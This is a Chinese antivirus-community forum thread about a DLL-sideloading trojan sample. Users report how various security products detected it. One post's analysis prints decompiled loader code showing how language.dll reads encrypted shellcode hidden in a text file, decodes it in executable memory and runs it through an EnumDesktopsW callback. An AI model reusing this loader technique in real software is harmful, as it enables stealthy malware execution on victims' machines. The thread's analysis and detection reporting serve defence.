楼主: 117054487
收起左侧

[病毒样本] 白加黑 1x

  [复制链接]
15717522768
发表于 2023-4-17 20:44:52 | 显示全部楼层
本帖最后由 15717522768 于 2023-4-17 20:49 编辑

KTS&ESSP 绿灯
KSN:
dll:灰灯
两个exe:绿灯
LGrid:
dll:黄灯
两个exe:绿灯
dght432
发表于 2023-4-17 21:13:31 | 显示全部楼层
类型:木马-Trojan.Generic
描述:木马通常利用系统的漏洞,绕过系统防御,达到:盗取账号、窃取资料、篡改文件、破坏数据的目的。经过360安全中心检验,此文件是木马,建议您立即处理。
扫描引擎:云安全引擎
文件路径:D:\360安全浏览器下载\infected\language.dll
文件大小:4.5K (4,608 字节)
文件指纹(MD5):dc0d4a97a3750d8c42ff382eafb2cffb
处理建议:隔离文件
Shake2333
发表于 2023-4-17 21:29:12 | 显示全部楼层
McAfee双击miss
GreatMOLA
发表于 2023-4-17 22:31:24 | 显示全部楼层
Norton
执行 成功建立连接
已上报
喀反
发表于 2023-4-17 22:44:25 | 显示全部楼层
WD扫描miss
lbyxiaolizi1
发表于 2023-4-18 00:07:54 | 显示全部楼层
卡巴扫描miss
wowocock
发表于 2023-4-18 10:01:10 | 显示全部楼层
autorun.exe加载language.dll,后者加载隐藏在templateG.txt的加密SHELL CODE ,解密后,通过 EnumDesktopsW执行。
HANDLE sub_100011D0()
{
  int v0; // eax
  HANDLE result; // eax
  void *v2; // ebx
  DWORD FileSize; // edi
  HMODULE LibraryW; // eax
  FARPROC pVirtualAlloc; // eax
  int AllocAddr; // eax
  BOOL (__stdcall *pShellCode)(LPWSTR, LPARAM); // esi
  DWORD v8; // edi
  char v9; // dl
  _BYTE *v10; // esi
  WCHAR Filename[260]; // [esp+0h] [ebp-25Ch] BYREF
  HANDLE v12; // [esp+208h] [ebp-54h]
  BOOL (__stdcall *v13)(LPWSTR, LPARAM); // [esp+20Ch] [ebp-50h]
  WCHAR String2[2]; // [esp+210h] [ebp-4Ch] BYREF
  int v15; // [esp+214h] [ebp-48h]
  int v16; // [esp+218h] [ebp-44h]
  int v17; // [esp+21Ch] [ebp-40h]
  int v18; // [esp+220h] [ebp-3Ch]
  int v19; // [esp+224h] [ebp-38h]
  int v20; // [esp+228h] [ebp-34h]
  WCHAR LibFileName[2]; // [esp+22Ch] [ebp-30h] BYREF
  int v22; // [esp+230h] [ebp-2Ch]
  int v23; // [esp+234h] [ebp-28h]
  int v24; // [esp+238h] [ebp-24h]
  int v25; // [esp+23Ch] [ebp-20h]
  int v26; // [esp+240h] [ebp-1Ch]
  __int16 v27; // [esp+244h] [ebp-18h]
  DWORD NumberOfBytesRead; // [esp+248h] [ebp-14h] BYREF
  CHAR ProcName[16]; // [esp+24Ch] [ebp-10h] BYREF

  GetModuleFileNameW(0, Filename, 0x104u);
  v0 = lstrlenW(Filename);
  if ( v0 > 0 )
  {
    while ( Filename[v0] != '\\' )
    {
      if ( --v0 <= 0 )
        goto LABEL_6;
    }
    Filename[v0 + 1] = 0;
  }
LABEL_6:
  *(_DWORD *)String2 = 'e\0t';
  v15 = 'p\0m';
  v16 = 'a\0l';
  v17 = 'e\0t';
  v18 = '.\0G';
  v19 = 'x\0t';
  v20 = 't';
  lstrcatW(Filename, String2);
  result = CreateFileW(Filename, 0x80000000, 1u, 0, 3u, 0x80u, 0);
  v2 = result;
  v12 = result;
  if ( result )
  {
    FileSize = GetFileSize(result, 0);
    if ( FileSize > 0x5000 )
    {
      *(_DWORD *)LibFileName = 'E\0K';
      v22 = 'N\0R';
      v23 = 'L\0E';
      v24 = '2\03';
      v25 = 'D\0.';
      v26 = 'L\0L';
      v27 = 0;
      strcpy(ProcName, "VirtualAlloc");
      LibraryW = LoadLibraryW(LibFileName);
      pVirtualAlloc = GetProcAddress(LibraryW, ProcName);
      AllocAddr = ((int (__stdcall *)(_DWORD, int, int, int))pVirtualAlloc)(0, 0x4E00000, 12288, 64);
      if ( AllocAddr )
      {
        pShellCode = (BOOL (__stdcall *)(LPWSTR, LPARAM))(AllocAddr + 0x1700000);
        NumberOfBytesRead = 0;
        v13 = (BOOL (__stdcall *)(LPWSTR, LPARAM))(AllocAddr + 0x1700000);
        if ( ReadFile(v2, (LPVOID)(AllocAddr + 0x1700000), FileSize, &NumberOfBytesRead, 0) )
        {
          v8 = NumberOfBytesRead - 1;
          v9 = *(_BYTE *)pShellCode;
          if ( NumberOfBytesRead != 1 )
          {
            v10 = (char *)pShellCode + 1;
            do
            {
              *(v10 - 1) = ~v9 & *v10 | v9 & ~*v10;
              ++v10;
              --v8;
            }
            while ( v8 );
            v2 = v12;
            pShellCode = v13;
          }
          EnumDesktopsW(0, pShellCode, 0);
          SleepEx(0xFFFFFFFF, 0);
        }
      }
    }
    return (HANDLE)CloseHandle(v2);
  }
  return result;
}

评分

参与人数 1人气 +3 收起 理由
隔山打空气 + 3 感谢解答: )

查看全部评分

anthonyqian
发表于 2023-4-18 10:43:07 | 显示全部楼层
Kaspersky

New malicious software was found in the attached file. Its detection will be included in the next update.
Trojan.Win32.DllHijacking.cs
东南大学
发表于 2023-4-18 12:51:17 | 显示全部楼层
  1. 2023/04/18 12:48:09.133 c:\Downloads\missed\language.dll
  2.         detected 'UDS:Trojan.Win32.DllHijacking.a'
  3. 2023/04/18 12:48:09.533 \\?\c:\Downloads\missed\language.dll
  4.         scan result - INFECTED
复制代码
anthonyqian
发表于 2023-4-18 13:12:16 | 显示全部楼层
有趣,VT上DeepInstinct、瑞星、elastic报毒好几十个小时了,迈克菲没拉黑;卡巴今天早上报了,迈克菲迅速拉黑
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 08:29 , Processed in 0.143180 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表